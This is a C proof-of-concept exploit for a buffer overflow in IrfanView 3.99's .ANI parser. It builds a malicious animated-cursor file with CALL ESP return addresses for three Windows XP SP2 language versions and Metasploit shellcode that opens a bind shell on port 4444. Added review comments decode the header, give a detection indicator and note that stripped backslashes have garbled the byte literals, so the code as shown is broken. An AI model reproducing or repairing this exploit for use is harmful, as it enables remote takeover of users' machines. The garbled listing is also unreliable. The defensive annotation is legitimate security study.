
# Title : IrfanView 3.99 .ANI File Local Buffer Overflow Exploit (multiple targets)
# Published : 2007-04-09
# Author : Breno Silva Pinto


/*
                IrfanView 3.99 .ANI File Buffer Overflow (Multiple Targets and port bind shell)                 
                
                Old Target:
                     Windows XP Sp2 FR   
                
                New targets:
                     Windows XP SP2 Portuguese Call ESP Addr 
                     Windows XP SP2 English    Call ESP Addr 
          
      Greetz: Ricardo Fiorelli, Marsu (make this possible.. nice job!), Str0ke , Sekure.org guys!
                
                     
*/

#include <stdio.h>
#include <stdlib.h>

/* win32_exec -  EXITFUNC=process Bind TCP port 4444 http://metasploit.com */
/*
 * Payload placed into the crafted file image at evilbuff + ani_size + 466
 * (see main()).  Its length is taken with strlen() there, so the array is
 * treated as a C string and must contain no embedded NUL.
 *
 * NOTE(review): in this copy of the listing every backslash has been stripped,
 * so the literals below are the ASCII text "xfcx6a..." rather than the byte
 * values the author intended.  As written, strlen(BindShellcode) is several
 * times the original payload length, and the offsets computed in main() no
 * longer match the layout described in its comments.
 */
char BindShellcode[]=
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6c" 
"x24x24x8bx45x3cx8bx7cx05x78x01xefx8b" 
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01" 
"xeex31xc0x99xacx84xc0x74x07xc1xcax0d" 
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5f" 
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb" 
"x03x2cx8bx89x6cx24x1cx61xc3x31xdbx64" 
"x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" 
"x08x5ex68x8ex4ex0execx50xffxd6x66x53" 
"x66x68x33x32x68x77x73x32x5fx54xffxd0" 
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66" 
"x81xedx08x02x55x6ax02xffxd0x68xd9x09" 
"xf5xadx57xffxd6x53x53x53x53x53x43x53" 
"x43x53xffxd0x66x68x11x5cx66x53x89xe1" 
"x95x68xa4x1ax70xc7x57xffxd6x6ax10x51" 
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53" 
"x55xffxd0x68xe5x49x86x49x57xffxd6x50" 
"x54x54x55xffxd0x93x68xe7x79xc6x79x57"
"xffxd6x55xffxd0x66x6ax64x66x68x63x6d" 
"x89xe5x6ax50x59x29xccx89xe7x6ax44x89" 
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93" 
"x8dx7ax38xabxabxabx68x72xfexb3x16xff" 
"x75x44xffxd6x5bx57x52x51x51x51x6ax01"
"x51x51x55x51xffxd0x68xadxd9x05xcex53" 
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83" 
"xc4x64xffxd6x52xffxd0x68x7exd8xe2x73" 
"x53xffxd6xffxd0";

/*
 * Fixed RIFF prefix copied to the start of the file image.  Decoding the
 * intended byte values (the backslashes are stripped in this copy, see the
 * note on BindShellcode):
 *
 *   "RIFF" 0x0000162a "ACON"        RIFF container, form type ACON (.ANI)
 *   "LIST" 0x00000044 "INFO"        INFO list
 *     "INAM" 0x0000000a "Metronome\0"
 *     "IART" 0x00000026 "MarsupilamiPowa@hotmail.com March  07\0"
 *   "anih" 0x00001024               anih chunk with a declared length of 0x1024
 *   0x24                            first byte of the chunk body
 *
 * Defender's note: the ANIHEADER structure carried by an anih chunk is 36
 * (0x24) bytes, so a declared anih length of 0x1024 is malformed.  This is
 * presumably the condition the target parser mishandles — copying the
 * declared chunk length into a fixed-size header — and an anih chunk whose
 * length field is not 36 is a usable indicator when scanning .ANI files.  A
 * hardened parser validates the chunk length against the structure size
 * before copying.
 */
unsigned char Ani_headers[] = 
"x52x49x46x46x2ax16x00x00x41x43x4fx4ex4cx49x53x54"
"x44x00x00x00x49x4ex46x4fx49x4ex41x4dx0ax00x00x00"
"x4dx65x74x72x6fx6ex6fx6dx65x00x49x41x52x54x26x00"
"x00x00x4dx61x72x73x75x70x69x6cx61x6dx69x50x6fx77"
"x61x40x68x6fx74x6dx61x69x6cx2ex63x6fx6dx20x4dx61"
"x72x63x68x20x20x30x37x00x61x6ex69x68x24x10x00x00"
"x24";


/*
 * Writes the crafted .ANI file image to argv[1].
 *
 * Usage: <prog> <file.ani> <target>, where target 1..3 selects which 4-byte
 * address is written into the overwritten slot (see the switch below).
 *
 * Layout of evilbuff (1500 bytes, written to the file in full):
 *   [0, ani_size)             Ani_headers (RIFF/ACON prefix, documented above)
 *   [ani_size, 1500)          0x90 filler from memset()
 *   ani_size + 459, 4 bytes   per-target address (the author's comments call
 *                             it a CALL ESP in kernel32.dll)
 *   ani_size + 466 onward     BindShellcode
 *
 * Review notes on this historical PoC (documented, not changed here):
 *  - memset/memcpy/strlen are used without #include <string.h>; only stdio.h
 *    and stdlib.h are included, so these are implicit declarations that
 *    C99 and later reject.
 *  - fopen() is not checked for NULL, and the fwrite()/fclose() results are
 *    ignored, so a failed write is reported as ".ANI file created".
 *  - The switch has no default: an unrecognised target leaves 0x90 bytes in
 *    the address slot and the file is still written.
 *  - With the backslashes stripped in this copy, "n" is printed literally
 *    instead of a newline, each "x5dx38x82x7c" literal is 12 characters of
 *    which memcpy copies the first 4, and strlen(BindShellcode) no longer
 *    reflects the intended payload length.
 */
int main(int argc, char* argv[])
{
	FILE* anifile;            /* output stream for argv[1] */
	char evilbuff[1500];      /* whole file image; a byte buffer, not a C string */
	int ani_size;             /* length of Ani_headers without its terminating NUL */
	
	printf("[+] IrfanView 3.99 .ANI File Buffer Overflow (Multiple targets / Port bind shellcode )n");
	printf("[+] Breno Silva Pinto - bsilva[at]sekure.orgn");
	if (argc!=3) {
		printf("[+] Usage: %s <file.ani> <target>n",argv[0]);
		printf("[+] Targets:n");
        printf("[+] 1 - Windows Xp Sp2 Portuguesen");
        printf("[+] 2 - Windows Xp SP2 Francen");
        printf("[+] 3 - Windows Xp SP2 Englishn");
        return 0;
	}
	
	ani_size=sizeof(Ani_headers)-1;         /* -1 drops the string terminator */
	memset(evilbuff,0x90,1500);             /* fill the whole image with 0x90 first */
	memcpy(evilbuff,Ani_headers,ani_size);  /* RIFF/ACON prefix at offset 0 */
	
	/* Per-target 4-byte address at ani_size + 459; no default case, so any
	 * other value leaves the 0x90 filler in place. */
	switch (atoi(argv[2])) {
        case 1: /* PORTUGUESE - BR */
             memcpy(evilbuff+ani_size+459,"x5dx38x82x7c",4); 				/* CALL ESP in Kernel32.dll */
         break;
    	case 2: /* FRENCH */
             memcpy(evilbuff+ani_size+459,"x8bx51x81x7c",4); 				/* CALL ESP in Kernel32.dll */
    	 break;
        case 3: /* ENGLISH */
             memcpy(evilbuff+ani_size+459,"xd8x69x83x7c",4); 				/* CALL ESP in Kernel32.dll */
         break;
    }
    
	/* Payload at ani_size + 466; strlen() requires BindShellcode to be NUL-free. */
	memcpy(evilbuff+ani_size+466,BindShellcode,strlen(BindShellcode));
	/* Single NUL byte at ani_size + strlen(BindShellcode) + 10.  Its purpose is
	 * not evident from the code: the offset is relative to the payload length
	 * rather than to the +466 used above. */
	memset(evilbuff+ani_size+strlen(BindShellcode)+10,0,1);
	
	anifile=fopen(argv[1],"wb");                      /* unchecked: NULL on failure */
	fwrite( evilbuff, 1, sizeof(evilbuff), anifile ); /* always all 1500 bytes */
	fclose(anifile);
	printf(".ANI file createdn");
	return 0;
	
}
